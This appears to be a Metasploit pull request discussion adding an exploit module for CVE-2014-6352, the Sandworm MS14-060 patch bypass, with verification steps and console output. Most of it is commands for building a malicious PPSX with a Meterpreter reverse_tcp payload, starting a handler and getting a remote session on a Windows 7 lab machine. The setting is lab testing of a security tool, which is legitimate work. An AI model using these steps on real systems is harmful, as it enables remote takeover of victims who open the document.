Add module for CVE-2014-6352 (sandworm ms14-060 bypass) (No UAC bypass)

[jvazquez-r7]

Since details have been published: http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous, this pull request adds a module with the ms14-060 bypass as exploited in the wild. It means NO UAC bypass. So unless UAC is disabled or the user is an Administrator the UAC prompt will trigger. As also explained by Haifei Li in the blog post.

Once Haifei Li publishes contents about his complete bypass (including UAC) this module can be updated, or a new one can be added if necessary.

With @wchen-r7 we were discussing about the UAC bypass, but we have not been successful (at the moment :P). Since the details are public, and this technique has been used in the wild, maybe this is useful for someone even without UAC bypass.

If it's not good enough because doesn't bypass UAC I won't be hurt if it's discarded at this moment. Or remains opens in case there are more details in the near future.

Just doing the Pull Request because figured out maybe can be useful for someone.

Verification

• Install Windows 7 SP1 (32 bits)
• Install Office 2010 SP2 (SP2 is important :) same history than with ms14_060_sandworm).
• Optional: Apply MS14_060
• Generate the ppsx with the fileformat exploit:

msf > use exploit/windows/fileformat/ms14_064_packager_run_as_admin
msf exploit(ms14_064_packager_run_as_admin) > show options

Module options (exploit/windows/fileformat/ms14_064_packager_run_as_admin):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.ppsx         yes       The PPSX file


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP1 / Office 2010 SP2 / Office 2013


msf exploit(ms14_064_packager_run_as_admin) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_064_packager_run_as_admin) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(ms14_064_packager_run_as_admin) > set LPORT 4444
LPORT => 4444
msf exploit(ms14_064_packager_run_as_admin) > exploit

[*] Creating 'msf.ppsx' file ...
[+] msf.ppsx stored at /Users/jvazquez/.msf4/local/msf.ppsx

• Setup the payload handler:

msf exploit(ms14_064_packager_run_as_admin) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

• Open the ppsx in the target (No external samba resource is needed in this case).
• An UAC prompt should trigger, allow it
• Verify you get a session in the handler

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 172.16.158.132

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
msf exploit(handler) >

[wchen-r7]

I used Office 2013 instead.

msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.122

meterpreter >